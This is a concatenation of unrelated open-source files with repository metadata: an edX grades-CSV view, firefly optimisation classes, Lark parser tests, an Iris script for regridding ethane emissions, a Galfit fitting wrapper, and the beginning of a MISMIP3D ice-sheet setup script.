'staff_access': request.user.is_staff,
'ordered_grades': sorted(
course.grade_cutoffs.items(), key=lambda i: i[1], reverse=True),
})
# Grades can potentially be written - if so, let grading manage the transaction.
@transaction.non_atomic_requests
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@coach_dashboard
def ccx_grades_csv(request, course, ccx=None):
"""
Download grades as CSV.
"""
if not ccx:
raise Http404
ccx_key = CCXLocator.from_course_locator(course.id, unicode(ccx.id))
with ccx_course(ccx_key) as course:
enrolled_students = User.objects.filter(
courseenrollment__course_id=ccx_key,
courseenrollment__is_active=1
).order_by('username').select_related("profile")
grades = CourseGradeFactory().iter(enrolled_students, course)
header = None
rows = []
for student, course_grade, __ in grades:
if course_grade:
# We were able to successfully grade this student for this
# course.
if not header:
# Encode the header row in utf-8 encoding in case there are
# unicode characters
header = [section['label'].encode('utf-8')
for section in course_grade.summary[u'section_breakdown']]
rows.append(["id", "email", "username", "grade"] + header)
percents = {
section['label']: section.get('percent', 0.0)
for section in course_grade.summary[u'section_breakdown']
if 'label' in section
}
row_percents = [percents.get(label, 0.0) for label in header]
rows.append([student.id, student.email, student.username,
course_grade.percent] + row_percents)
buf = StringIO()
writer = csv.writer(buf)
for row in rows:
writer.writerow(row)
response = HttpResponse(buf.getvalue(), content_type='text/csv')
response['Content-Disposition'] = 'attachment'
return response
|
procangroup/edx-platform
|
lms/djangoapps/ccx/views.py
|
Python
|
agpl-3.0
| 21,447
|
[
"VisIt"
] |
11c50d730555192f1bf8f8b27762954eafb54488711e6c461a07c7f007ef680f
|
'''
Created on 2015/03/13
@author: admin
'''
import numpy as np
class Firefly:
'''
Particle Swarm Optimization
'''
def __init__(self,ite,pop=20,alpha=0.25,beta=0.5, gamma=1.0, variant='sfa',torus=True,best=None,ftarget=-np.inf,threads=1):
'''
Default values are stable and usually fine.
Give maximum iteration (ite) and population size (pop) if needed based on the time you have.
Set 1 < thread for multithreading, however, creating threads have initial cost.
It is not recommended using multithreading for light functions.
Threading is not supported for this algorithm at the moment.
'''
self.ite = ite
self.pop = pop
self.beta = beta
self.alpha = alpha
self.gamma = gamma
self.variant = variant
self.torus = torus
self._best = best
self._ftarget = ftarget
self.threads = threads
def _init(self,dim,E):
self.pbests = [ np.random.rand(dim) for x in range(self.pop) ]
self.currents = [ np.random.rand(dim) for x in range(self.pop) ]
if None == self._best:
self._best = np.random.rand(dim)
self._bestScore = np.inf
else:
self._bestScore = E(np.array(self._best))
self._best = np.array(self._best)
self.pbestScores = [ np.inf for x in range(self.pop) ]
self.currentScores = [ np.inf for x in range(self.pop) ]
self._fcall = 0
self.changed = [ True for x in range(self.pop) ]
def _calcObj(self,E):
if 1==self.threads:
for i in range(self.pop):
if self.changed[i]:
self.changed[i] = False
if self.pop*self.ite <= self._fcall:
break
self.currentScores[i] = E(self.currents[i])
self._fcall += 1
else:
args = [[self.currents[k]] for k in range(self.pop)]
with mp.Pool(self.threads) as p:#,maxtasksperchild=1)
results = p.starmap(E, args)
self.currentScores = results
self._fcall += self.pop
def _rewriteBests(self,E):
for i in range(self.pop):
if self.currentScores[i] <= self.pbestScores[i]:
self.pbests[i] = self.currents[i].copy()
self.pbestScores[i] = self.currentScores[i]
if self.pbestScores[i] <= self._bestScore:
self._best = self.pbests[i].copy()
self._bestScore = self.pbestScores[i]
def run(self,E):
'''
Make sure that you rescale the objective function within 0 < x < 1,
since the initial points are uniformly distributed within that range.
'''
dim = E.dim()
self._init(dim,E)
self._calcObj(E)
self._rewriteBests(E)
cnt = 0
while self._fcall < self.pop*self.ite:
a = cnt%self.pop
b = int(cnt/self.pop)%self.pop
a, b = b, a
t = self._fcall/float(self.ite*self.pop)
beta = 0.267#self.beta
alpha = self.alpha*np.exp(-5.0*t)
if self.currentScores[b] <= self.currentScores[a]:
#beta = self.beta
#alpha = self.alpha
#alpha = 0.5-0.49*t
#beta = self.beta
#lambd = self.alpha
r = np.linalg.norm(self.currents[b]-self.currents[a])
gamma = self.gamma/np.sqrt(dim)
inside = -(gamma*(r**2.0)/float(dim))*10
rg = np.linalg.norm(self._best-self.currents[a])
inside2 = -(gamma*(rg**2.0)/float(dim))*10
#print(inside,inside2,np.exp(inside),np.exp(inside2))
if 'sfa' == self.variant:
#alpha = 0.1
self.currents[a] = self.currents[a]+beta*np.exp(inside)*(self.currents[b]-self.currents[a]) + alpha*(np.random.randn(dim))
elif 'mfa1' == self.variant:
self.currents[a] = self.currents[a]+beta*np.exp(inside)*(self.currents[b]-self.currents[a]) +beta*np.exp(inside2)*(self._best-self.currents[a]) + alpha*(np.random.rand(dim)-0.5)
elif 'nmfa' == self.variant:
lambd = 2.5
self.currents[a] = self.currents[a]+beta*np.exp(inside)*(self.currents[b]-self.currents[a]) +beta*np.exp(inside2)*(self._best-self.currents[a]) + lambd*(np.random.rand(dim)-0.5)*(self.currents[a]-self._best)+alpha*(np.random.rand(dim)-0.5)
if self.torus:
i = a
for j in range(dim):
self.currents[i][j] -= int(self.currents[i][j])
if self.currents[i][j] < 0:
self.currents[i][j] += 1
self.currentScores[a] = E(self.currents[a])
self._fcall += 1
if self.currentScores[a] <= self.pbestScores[a]:
self.pbests[a] = self.currents[a].copy()
self.pbestScores[a] = self.currentScores[a]
if self.pbestScores[a] <= self._bestScore:
self._best = self.pbests[a].copy()
self._bestScore = self.pbestScores[a]
if self._bestScore <= self._ftarget:
break
cnt += 1
return self._best
def name(self):
return self.__class__.__name__
class MathFly(Firefly):
'''
Particle Swarm Optimization
'''
def __init__(self,ite,pop=20,alpha=7.72,beta=1.0,torus=True,best=None,ftarget=-np.inf,threads=1):
'''
Default values are stable and usually fine.
Give maximum iteration (ite) and population size (pop) if needed based on the time you have.
Set 1 < thread for multithreading, however, creating threads have initial cost.
It is not recommended using multithreading for light functions.
'''
self.ite = ite
self.pop = pop
self.beta = beta
self.alpha = alpha
self.torus = torus
self._best = best
self._ftarget = ftarget
self.threads = threads
def run(self,E):
'''
Make sure that you rescale the objective function within 0 < x < 1,
since the initial points are uniformly distributed within that range.
'''
dim = E.dim()
self._init(dim,E)
self._calcObj(E)
while self._fcall < self.pop*self.ite:
self._rewriteBests(E)
if self._bestScore < self._ftarget:
break
#print("%s, %s, %s"%(k,self.gbestScore,list(self.gbest)))
#print("%s, %s, %s"%(k,self.currents[0][0],self.vs[0][0]))
self._moveToNext(dim)
self._calcObj(E)
self._rewriteBests(E)
return self._best
def _init(self,dim,E):
self.pbests = [ np.random.rand(dim) for x in range(self.pop) ]
self.currents = [ np.random.rand(dim) for x in range(self.pop) ]
if None == self._best:
self._best = np.random.rand(dim)
self._bestScore = np.inf
else:
self._bestScore = E(np.array(self._best))
self._best = np.array(self._best)
self.pbestScores = [ np.inf for x in range(self.pop) ]
self.currentScores = [ np.inf for x in range(self.pop) ]
self._fcall = 0
self.changed = [ True for x in range(self.pop) ]
def _rewriteBests(self,E):
for i in range(self.pop):
if self.currentScores[i] <= self.pbestScores[i]:
self.pbests[i] = self.currents[i].copy()
self.pbestScores[i] = self.currentScores[i]
if self.pbestScores[i] <= self._bestScore:
self._best = self.pbests[i].copy()
self._bestScore = self.pbestScores[i]
#print("best score = %f"%self.gbestScore)
#print("best = %s"%self.gbest)
#if hasattr(E,"cross"):
# print(E.cross(self.gbest))
def _calcObj(self,E):
if 1==self.threads:
for i in range(self.pop):
if self.changed[i]:
self.changed[i] = False
if self.pop*self.ite <= self._fcall:
break
self.currentScores[i] = E(self.currents[i])
self._fcall += 1
else:
args = [[self.currents[k]] for k in range(self.pop)]
with mp.Pool(self.threads) as p:#,maxtasksperchild=1)
results = p.starmap(E, args)
self.currentScores = results
self._fcall += self.pop
def _moveToNext(self,dim):
t = self._fcall/float(self.ite*self.pop)
for i in range(self.pop):
q1 = np.random.randint(0,self.pop)
while self.pbestScores[i] < self.pbestScores[q1]:
q1 = np.random.randint(0,self.pop)
if self.pbestScores[q1] <= self.pbestScores[i]:
self.changed[i] = True
self.currents[i] = self.currents[i]+self.beta*(self.pbests[q1]-self.currents[i]) + 0.254*np.exp(-self.alpha*t)*np.random.randn(dim)
if self.torus:
for j in range(dim):
self.currents[i][j] -= int(self.currents[i][j])
if self.currents[i][j] < 0:
self.currents[i][j] += 1
def name(self):
return self.__class__.__name__
|
kanemasa1987/Meatpie
|
optlib/firefly.py
|
Python
|
mit
| 9,673
|
[
"Firefly"
] |
d81f5fbb410063348f86f2c3d15e7218ffbb1480a7c0c7514539280678a7d011
|
from __future__ import absolute_import
import unittest
from lark import Lark
from lark.lexer import Token
from lark.tree import Tree
from lark.visitors import Visitor, Transformer, Discard
from lark.parsers.earley_forest import TreeForestTransformer, handles_ambiguity
class TestTreeForestTransformer(unittest.TestCase):
grammar = """
start: ab bc cd
!ab: "A" "B"?
!bc: "B"? "C"?
!cd: "C"? "D"
"""
parser = Lark(grammar, parser='earley', ambiguity='forest')
forest = parser.parse("ABCD")
def test_identity_resolve_ambiguity(self):
l = Lark(self.grammar, parser='earley', ambiguity='resolve')
tree1 = l.parse("ABCD")
tree2 = TreeForestTransformer(resolve_ambiguity=True).transform(self.forest)
self.assertEqual(tree1, tree2)
def test_identity_explicit_ambiguity(self):
l = Lark(self.grammar, parser='earley', ambiguity='explicit')
tree1 = l.parse("ABCD")
tree2 = TreeForestTransformer(resolve_ambiguity=False).transform(self.forest)
self.assertEqual(tree1, tree2)
def test_tree_class(self):
class CustomTree(Tree):
pass
class TreeChecker(Visitor):
def __default__(self, tree):
assert isinstance(tree, CustomTree)
tree = TreeForestTransformer(resolve_ambiguity=False, tree_class=CustomTree).transform(self.forest)
TreeChecker().visit(tree)
def test_token_calls(self):
visited = [False] * 4
class CustomTransformer(TreeForestTransformer):
def A(self, node):
assert node.type == 'A'
visited[0] = True
def B(self, node):
assert node.type == 'B'
visited[1] = True
def C(self, node):
assert node.type == 'C'
visited[2] = True
def D(self, node):
assert node.type == 'D'
visited[3] = True
tree = CustomTransformer(resolve_ambiguity=False).transform(self.forest)
assert visited == [True] * 4
def test_default_token(self):
token_count = [0]
class CustomTransformer(TreeForestTransformer):
def __default_token__(self, node):
token_count[0] += 1
assert isinstance(node, Token)
tree = CustomTransformer(resolve_ambiguity=True).transform(self.forest)
self.assertEqual(token_count[0], 4)
def test_rule_calls(self):
visited_start = [False]
visited_ab = [False]
visited_bc = [False]
visited_cd = [False]
class CustomTransformer(TreeForestTransformer):
def start(self, data):
visited_start[0] = True
def ab(self, data):
visited_ab[0] = True
def bc(self, data):
visited_bc[0] = True
def cd(self, data):
visited_cd[0] = True
tree = CustomTransformer(resolve_ambiguity=False).transform(self.forest)
self.assertTrue(visited_start[0])
self.assertTrue(visited_ab[0])
self.assertTrue(visited_bc[0])
self.assertTrue(visited_cd[0])
def test_default_rule(self):
rule_count = [0]
class CustomTransformer(TreeForestTransformer):
def __default__(self, name, data):
rule_count[0] += 1
tree = CustomTransformer(resolve_ambiguity=True).transform(self.forest)
self.assertEqual(rule_count[0], 4)
def test_default_ambig(self):
ambig_count = [0]
class CustomTransformer(TreeForestTransformer):
def __default_ambig__(self, name, data):
if len(data) > 1:
ambig_count[0] += 1
tree = CustomTransformer(resolve_ambiguity=False).transform(self.forest)
self.assertEqual(ambig_count[0], 1)
def test_handles_ambiguity(self):
class CustomTransformer(TreeForestTransformer):
@handles_ambiguity
def start(self, data):
assert isinstance(data, list)
assert len(data) == 4
for tree in data:
assert tree.data == 'start'
return 'handled'
@handles_ambiguity
def ab(self, data):
assert isinstance(data, list)
assert len(data) == 1
assert data[0].data == 'ab'
tree = CustomTransformer(resolve_ambiguity=False).transform(self.forest)
self.assertEqual(tree, 'handled')
def test_discard(self):
class CustomTransformer(TreeForestTransformer):
def bc(self, data):
return Discard
def D(self, node):
return Discard
class TreeChecker(Transformer):
def bc(self, children):
assert False
def D(self, token):
assert False
tree = CustomTransformer(resolve_ambiguity=False).transform(self.forest)
TreeChecker(visit_tokens=True).transform(tree)
def test_aliases(self):
visited_ambiguous = [False]
visited_full = [False]
class CustomTransformer(TreeForestTransformer):
@handles_ambiguity
def start(self, data):
for tree in data:
assert tree.data == 'ambiguous' or tree.data == 'full'
def ambiguous(self, data):
visited_ambiguous[0] = True
assert len(data) == 3
assert data[0].data == 'ab'
assert data[1].data == 'bc'
assert data[2].data == 'cd'
return self.tree_class('ambiguous', data)
def full(self, data):
visited_full[0] = True
assert len(data) == 1
assert data[0].data == 'abcd'
return self.tree_class('full', data)
grammar = """
start: ab bc cd -> ambiguous
| abcd -> full
!ab: "A" "B"?
!bc: "B"? "C"?
!cd: "C"? "D"
!abcd: "ABCD"
"""
l = Lark(grammar, parser='earley', ambiguity='forest')
forest = l.parse('ABCD')
tree = CustomTransformer(resolve_ambiguity=False).transform(forest)
self.assertTrue(visited_ambiguous[0])
self.assertTrue(visited_full[0])
def test_transformation(self):
class CustomTransformer(TreeForestTransformer):
def __default__(self, name, data):
result = []
for item in data:
if isinstance(item, list):
result += item
else:
result.append(item)
return result
def __default_token__(self, node):
return node.lower()
def __default_ambig__(self, name, data):
return data[0]
result = CustomTransformer(resolve_ambiguity=False).transform(self.forest)
expected = ['a', 'b', 'c', 'd']
self.assertEqual(result, expected)
if __name__ == '__main__':
unittest.main()
|
lark-parser/lark
|
tests/test_tree_forest_transformer.py
|
Python
|
mit
| 7,156
|
[
"VisIt"
] |
da3b3114f76436a6fceca507db143785023026cd3c191a7b2a68dd128f96d993
|
#!/usr/bin/env python
##############################################################################################
#
#
# regrid_emissions_N96e.py
#
#
# Requirements:
# Iris 1.10, cf_units, numpy
#
#
# This Python script has been written by N.L. Abraham as part of the UKCA Tutorials:
# http://www.ukca.ac.uk/wiki/index.php/UKCA_Chemistry_and_Aerosol_Tutorials_at_vn10.4
#
# Copyright (C) 2015 University of Cambridge
#
# This is free software: you can redistribute it and/or modify it under the
# terms of the GNU Lesser General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later
# version.
#
# It is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
# PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details.
#
# You find a copy of the GNU Lesser General Public License at <http://www.gnu.org/licenses/>.
#
# Written by N. Luke Abraham 2016-10-20 <nla27@cam.ac.uk>
#
#
##############################################################################################
# preamble
import os
import time
import iris
import cf_units
import numpy
# --- CHANGE THINGS BELOW THIS LINE TO WORK WITH YOUR FILES ETC. ---
# name of file containing an ENDGame grid, e.g. your model output
# NOTE: all the fields in the file should be on the same horizontal
# grid, as the field used MAY NOT be the first in order of STASH
grid_file='/group_workspaces/jasmin2/ukca/vol1/mkoehler/um/archer/ag542/apm.pp/ag542a.pm1988dec'
#
# name of emissions file
emissions_file='/group_workspaces/jasmin2/ukca/vol1/mkoehler/emissions/combined_1960/0.5x0.5/combined_sources_C2H6_lumped_1960_360d.nc'
#
# STASH code emissions are associated with
# 301-320: surface
# m01s00i305: C2H6 surface emissions
#
# 321-340: full atmosphere
#
stash='m01s00i305'
# --- BELOW THIS LINE, NOTHING SHOULD NEED TO BE CHANGED ---
species_name='C2H6'
# this is the grid we want to regrid to, e.g. N96 ENDGame
grd=iris.load(grid_file)[0]
grd.coord(axis='x').guess_bounds()
grd.coord(axis='y').guess_bounds()
# This is the original data
ems=iris.load_cube(emissions_file)
# make intersection between 0 and 360 longitude to ensure that
# the data is regridded correctly
nems = ems.intersection(longitude=(0, 360))
# make sure that we use the same coordinate system, otherwise regrid won't work
nems.coord(axis='x').coord_system=grd.coord_system()
nems.coord(axis='y').coord_system=grd.coord_system()
# now guess the bounds of the new grid prior to regridding
nems.coord(axis='x').guess_bounds()
nems.coord(axis='y').guess_bounds()
# now regrid
ocube=nems.regrid(grd,iris.analysis.AreaWeighted())
# now add correct attributes and names to netCDF file
ocube.var_name='emissions_'+str.strip(species_name)
ocube.long_name=str.strip(species_name)+' surf emissions'
ocube.units=cf_units.Unit('kg m-2 s-1')
ocube.attributes['vertical_scaling']='surface'
ocube.attributes['um_stash_source']=stash
ocube.attributes['tracer_name']=str.strip(species_name)
# global attributes, so don't set in local_keys
# NOTE: all these should be strings, including the numbers!
# basic emissions type
ocube.attributes['lumped_species']='C2H6, C2H4 and C2H2' # lumping of species
ocube.attributes['emission_type']='2' # periodic time series
ocube.attributes['update_type']='2' # same as above
ocube.attributes['update_freq_in_hours']='120' # i.e. 5 days
ocube.attributes['um_version']='10.6' # UM version
ocube.attributes['source']='combined_sources_C2H6_lumped_1960_360d.nc'
ocube.attributes['title']='Monthly surface emissions of ethane, lumped with ethene and ethyne, for 1960'
ocube.attributes['File_version']='v1'
ocube.attributes['File_creation_date']=time.ctime(time.time())
ocube.attributes['grid']='regular 1.875 x 1.25 degree longitude-latitude grid (N96e)'
ocube.attributes['history']=time.ctime(time.time())+': '+__file__+' \n'+ocube.attributes['history']
ocube.attributes['institution']='Centre for Atmospheric Science, Department of Chemistry, University of Cambridge, U.K.'
ocube.attributes['reference']='Granier et al., Clim. Change, 2011; Lamarque et al., Atmos. Chem. Phys., 2010'
del ocube.attributes['NCO']
del ocube.attributes['file_creation_date']
del ocube.attributes['description']
# rename and set time coord - mid-month from 1960-Jan to 2020-Dec
# this bit is annoyingly fiddly
ocube.coord(axis='t').var_name='time'
ocube.coord(axis='t').standard_name='time'
ocube.coords(axis='t')[0].units=cf_units.Unit('days since 1960-01-01 00:00:00', calendar='360_day')
ocube.coord(axis='t').points=numpy.array([15, 45, 75, 105, 135, 165, 195, 225, 255, 285, 315, 345])
# make z-direction.
zdims=iris.coords.DimCoord(numpy.array([0]),standard_name = 'model_level_number',
units='1',attributes={'positive':'up'})
ocube.add_aux_coord(zdims)
ocube=iris.util.new_axis(ocube, zdims)
# now transpose cube to put Z 2nd
ocube.transpose([1,0,2,3])
# make coordinates 64-bit
ocube.coord(axis='x').points=ocube.coord(axis='x').points.astype(dtype='float64')
ocube.coord(axis='y').points=ocube.coord(axis='y').points.astype(dtype='float64')
#ocube.coord(axis='z').points=ocube.coord(axis='z').points.astype(dtype='float64') # integer
ocube.coord(axis='t').points=ocube.coord(axis='t').points.astype(dtype='float64')
# for some reason, longitude_bounds are double, but latitude_bounds are float
ocube.coord('latitude').bounds=ocube.coord('latitude').bounds.astype(dtype='float64')
# add forecast_period & forecast_reference_time
# forecast_reference_time
frt=numpy.array([15, 45, 75, 105, 135, 165, 195, 225, 255, 285, 315, 345], dtype='float64')
frt_dims=iris.coords.AuxCoord(frt,standard_name = 'forecast_reference_time',
units=cf_units.Unit('days since 1960-01-01 00:00:00', calendar='360_day'))
ocube.add_aux_coord(frt_dims,data_dims=0)
ocube.coord('forecast_reference_time').guess_bounds()
# forecast_period
fp=numpy.array([-360],dtype='float64')
fp_dims=iris.coords.AuxCoord(fp,standard_name = 'forecast_period',
units=cf_units.Unit('hours'),bounds=numpy.array([-720,0],dtype='float64'))
ocube.add_aux_coord(fp_dims,data_dims=None)
# add-in cell_methods
ocube.cell_methods = [iris.coords.CellMethod('mean', 'time')]
# set _FillValue
fillval=1e+20
ocube.data = numpy.ma.array(data=ocube.data, fill_value=fillval, dtype='float32')
# output file name, based on species
outpath='ukca_emiss_'+species_name+'.nc'
# don't want time to be cattable, as is a periodic emissions file
iris.FUTURE.netcdf_no_unlimited=True
# annoying hack to set a missing_value attribute as well as a _FillValue attribute
dict.__setitem__(ocube.attributes, 'missing_value', fillval)
# now write-out to netCDF
saver = iris.fileformats.netcdf.Saver(filename=outpath, netcdf_format='NETCDF3_CLASSIC')
saver.update_global_attributes(Conventions=iris.fileformats.netcdf.CF_CONVENTIONS_VERSION)
saver.write(ocube, local_keys=['vertical_scaling', 'missing_value','um_stash_source','tracer_name','lumped_species'])
# end of script
|
acsis-project/emissions
|
emissions/python/periodic_1960/regrid_C2H6_emissions_n96e_360d_1960.py
|
Python
|
gpl-3.0
| 7,151
|
[
"NetCDF"
] |
e9146455bfc53144f62cbec0e0e23d508978ddf5f5c469aa808cb6214f3d41d4
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Wed Dec 14 16:21:46 2016
Defines a function to call Galfit for a single fits image sersic optimisation
Also a funtion to calculate chisquared for a given sersic parametrerisation
@author: rs548
"""
from __future__ import division, print_function
import subprocess
#import astropy
from astropy.io import fits
from os import listdir
from os import getcwd
from os import rename
from os import chdir
from os import remove
from textwrap import dedent
import time
trashDir = '/Users/rs548/Documents/Science/PeteHurley/TRASH/'
#chdir(workDir + 'TRASH/')
wkdir = getcwd()
#print('at galfit import wkdir is' + wkdir)
def optimise(fitsfile, folder, source, field=None,**kwargs):
#print('galfit.py has been called')
if field == None:
print('no field assigned for Galfit run, assuming SDSS')
field = 'SDSS'
#field = 'SDSS'
if field == 'UltraVISTA':
plateScale = '0.14997825'
magphotzero = '30.0'
inputDir = '/Users/rs548/Documents/Science/PeteHurley/UV/'
outputDir = '/Users/rs548/Documents/Science/PeteHurley/UVG/'
elif field == 'SDSS':
plateScale = '0.396127'
# SDSS from http://classic.sdss.org/dr7/algorithms/fluxcal.html
#magphotzero = 24.63 #u band
magphotzero = '25.11' #g band
#magphotzero = 24.80 #r band
#magphotzero = 24.36 #i band
#magphotzero = 22.83 #z band
inputDir = '/Users/rs548/Documents/Science/PeteHurley/SDSS/'
outputDir = '/Users/rs548/Documents/Science/PeteHurley/SG/'
filename=str(fitsfile)
fileRoot = filename[:-5]
restart = False
rGuess = source['expRad_r_sdss'] / float(plateScale)
axisRatioGuess = source['expAB_r_sdss']
method = 0
psf = 'none' #folder + 'PSF-g.fits' #'PSF-g.fits' psfNOTOK.fits
inputText = """
===============================================================================
# IMAGE and GALFIT CONTROL PARAMETERS
A) {folder}{filename} # Input data image (FITS file)
B) {outputDir}{fileRoot}-output.fits # Output data image block
C) none # Sigma image name (made from data if blank or "none")
D) {psf} # # Input PSF image and (optional) diffusion kernel
E) 1 # PSF fine sampling factor relative to data
F) none # Bad pixel mask (FITS image or ASCII coord list)
G) /Users/rs548/Documents/Science/PeteHurley/12xyequal.constraints # File with parameter constraints (ASCII file)
H) 1 150 1 150 # Image region to fit (xmin xmax ymin ymax)
I) 100 100 # Size of the convolution box (x y)
J) {magphotzero} # Magnitude photometric zeropoint (UltraVISTA = 30.0) ???
K) {plateScale} {plateScale} # Plate scale (dx dy) [arcsec per pixel] (UltraVISTA= 0.14997825 0.14997825 )
O) regular # Display type (regular, curses, both)
P) {method} # Choose: 0=optimize, 1=model, 2=imgblock, 3=subcomps
# INITIAL FITTING PARAMETERS
#
# For object type, the allowed functions are:
# nuker, sersic, expdisk, devauc, king, psf, gaussian, moffat,
# ferrer, powsersic, sky, and isophote.
#
# Hidden parameters will only appear when they're specified:
# C0 (diskyness/boxyness),
# Fn (n=integer, Azimuthal Fourier Modes),
# R0-R10 (PA rotation, for creating spiral structures).
#
# -----------------------------------------------------------------------------
# par) par value(s) fit toggle(s) # parameter description
# -----------------------------------------------------------------------------
# Object number: 1
0) sersic # object type
1) 75.0 75.0 1 1 # position x, y
3) 20.0 1 # Integrated magnitude
4) 4 1 # R_e (half-light radius) [pix]
5) 4.0 1 # Sersic index n (de Vaucouleurs n=4)
6) 0.0000 0 # -----
7) 0.0000 0 # -----
8) 0.0000 0 # -----
9) 1 1 # axis ratio (b/a)
10) 0.0 1 # position angle (PA) [deg: Up=0, Left=90]
Z) 0 # output option (0 = resid., 1 = Don't subtract)
# Object number: 2
0) expdisk # object type
1) 75.0 75.0 1 1 # position x, y
3) 17.0 1 # Integrated magnitude
4) {rGuess} 1 # R_s [pix]
9) {axisRatioGuess} 1 # axis ratio (b/a)
10) 0.0 1 # position angle (PA) [deg: Up=0, Left=90]
Z) 0 # output option (0 = resid., 1 = Don't subtract)
# Object number: 3
0) sky # object type
1) 0.001 1 # sky background at center of fitting region [ADUs]
2) 0.0000 0 # dsky/dx (sky gradient in x)
3) 0.0000 0 # dsky/dy (sky gradient in y)
Z) 0 # output option (0 = resid., 1 = Don't subtract)
================================================================================
""".format(**vars())
inputFile = open(outputDir + fileRoot + '.feedme', "w")
inputFile.write(inputText)
inputFile.close()
log_file = open(outputDir + fileRoot + '-log.txt', 'a')
#print('at galfit run wkdir is' + wkdir)
if restart:
print('restarting with last run parameters')
else:
#print( listdir(trashDir))
for restartFile in listdir(trashDir):
if restartFile[0:7] == 'galfit.':
rename(trashDir + restartFile, trashDir + 'wasnotused' + restartFile)
#print(trashDir + restartFile, trashDir + 'wasnotused' + restartFile)
#'-imax', '99',
print('Galfit.py is about to call galfit on ' + filename)
#print(inputText)
t0 = time.time()
subprocess.call(['/usr/local/bin/galfit',
outputDir
+ fileRoot + '.feedme'],
stdout=log_file)
trun = time.time() - t0
print('Galfit took ', round(trun,1), 's to run.')
log_file.close()
#fitsOutput = fits.open('imgblock.fits')
#fitsOutput.close()
#chiSq = fitsOutput[2].header['CHISQ']
#print('ChiSq is ',chiSq )
###############################PROFIT INPUT TO COPY##########################
# profit_model = {'width': data.image.shape[1],
# 'height': data.image.shape[0],
# 'magzero': data.magzero,
# 'psf': data.psf,
# 'profiles': {'sersic': sparams}
# }
# print(profit_model)
# if use_mask:
# profit_model['calcmask'] = data.calcregion
# return allparams, np.array(pyprofit.make_model(profit_model))
#get chi squared for use by mcmc code
def chisquared(image,model,*args,**kwargs):
"""
This function should take an input that can be taken by pyprofit and return
the same object that pyprofit would return. For rigour any code should
therefore be able to be run using both pyprofit and Galfit. This will allow
comparison and help with publishing given the long standing of Galfit.
"""
temp = 'temp/'
folder = '/Users/rs548/Documents/Science/Blended/'
imageName = 'tempOut'
#Call galfit for param values model only
nObjects = len(model)
allObjects = ''
n = 1
for component in model:
if component[0] == 'sersic':
thisObject = """
# Object number: {n}
0) {component[0]} # object type
1) {component[1]} {component[2]} 1 1 # position x, y
3) {component[3]} 1 # Integrated magnitude
4) {component[4]} 1 # R_e (half-light radius) [pix]
5) {component[5]} 1 # Sersic index n (de Vaucouleurs n=4)
6) 0.0000 0 # -----
7) 0.0000 0 # -----
8) 0.0000 0 # -----
9) {component[9]} 1 # axis ratio (b/a)
10) {component[10]} 1 # position angle (PA) [deg: Up=0, Left=90]
Z) 0 # output option (0 = resid., 1 = Don't subtract)
""".format(**vars())
elif component[0] == 'sky':
thisObject = """
# Object number: {n}
0) {component[0]} # object type
1) {component[1]} 1 # Sky background
2) 0.000e+00
3) 0.000e+00
Z) 0 # output option (0 = resid., 1 = Don't subtract)
""".format(**vars())
allObjects = allObjects + dedent(thisObject)
n = n + 1
#return chi squared measure of liklihood
method = '2'
inputText = """
===============================================================================
# IMAGE and GALFIT CONTROL PARAMETERS
A) {image} # Input data image (FITS file)
B) {folder}{temp}{imageName}-output.fits # Output data image block
C) none # Sigma image name (made from data if blank or "none")
D) none #/Users/rs548/Documents/Science/Blended/PSF-g.fits # # Input PSF image and (optional) diffusion kernel
E) 1 # PSF fine sampling factor relative to data
F) none # Bad pixel mask (FITS image or ASCII coord list)
G) none # File with parameter constraints (ASCII file)
H) 1448 2048 889 1489 # Image region to fit (xmin xmax ymin ymax)
I) 100 100 # Size of the convolution box (x y)
J) 25.110 # Magnitude photometric zeropoint
K) 0.396127 0.396127 # Plate scale (dx dy) [arcsec per pixel]
O) regular # Display type (regular, curses, both)
P) {method} # Choose: 0=optimize, 1=model, 2=imgblock, 3=subcomps
# INITIAL FITTING PARAMETERS
#
# For object type, the allowed functions are:
# nuker, sersic, expdisk, devauc, king, psf, gaussian, moffat,
# ferrer, powsersic, sky, and isophote.
#
# Hidden parameters will only appear when they're specified:
# C0 (diskyness/boxyness),
# Fn (n=integer, Azimuthal Fourier Modes),
# R0-R10 (PA rotation, for creating spiral structures).
#
# -----------------------------------------------------------------------------
# par) par value(s) fit toggle(s) # parameter description
# -----------------------------------------------------------------------------
{allObjects}
================================================================================
""".format(**vars())
inputFile = open(folder + temp
+ imageName + '.feedme', "w")
inputFile.write(inputText)
inputFile.close()
log_file = open(imageName + "-log.txt", "a")
#'-imax', '99',
print('Galfit.py is about to call galfit for chiSquared')
print(inputText)
t0 = time.time()
subprocess.call(['/usr/local/bin/galfit',
folder + temp
+ imageName + '.feedme'],
stdout=log_file)
print('galfit.chisquared took ',time.time() - t0, 's to run galfit')
log_file.close()
output = fits.open(folder + temp
+ imageName + '-output.fits')
#Get chi squared from fits file
chiSquared = output[2].header['CHISQ']
#remove(folder + temp
# + imageName + '-output.fits')
print('galfit.chisquared gives a value of ', chiSquared)
return chiSquared
|
raphaelshirley/regphot
|
regphot/galfit.py
|
Python
|
mit
| 12,302
|
[
"Gaussian"
] |
579b28116f68a3a1a7079e51031130181b27497209e500f6d7fa7ec6c0a580f1
|
#!/usr/bin/env python
# Copyright (C) 2012, 2014 Moritz Huetten
# geometry setup MISMIP3D P75S/P10S-experiment
from pylab import *
import os
import sys
import getopt
import math
#from numpy import *
import numpy as np
try:
from netCDF4 import Dataset as NC
except:
print "netCDF4 is not installed!"
sys.exit(1)
subgl = False
#### command line arguments ####
try:
opts, args = getopt.getopt(sys.argv[1:], "si:a:", ["subgl", "inpath=", "amplitude="])
for opt, arg in opts:
if opt in ("-s", "--subgl"):
subgl = True
if opt in ("-i", "--inpath"):
inpath = arg
if opt in ("-a", "--amplitude"):
a = arg # pertubation amplitude for tauc
except getopt.GetoptError:
print 'Incorrect command line arguments'
sys.exit(2)
a = float(a) * 100.0
a = int(a)
if a == 75:
WRIT_FILE = 'MISMIP3D_P75S_initialSetup.nc'
a = 0.75
elif a == 10:
WRIT_FILE = 'MISMIP3D_P10S_initialSetup.nc'
a = 0.1
else:
WRIT_FILE = 'dummy'
######## geometry setup (moritz.huetten@pik) #########
### CONSTANTS ###
secpera = 31556926.
ice_density = 910.0
yExtent = 2 * 50 # in km
xExtent = 2 * 800 # in km
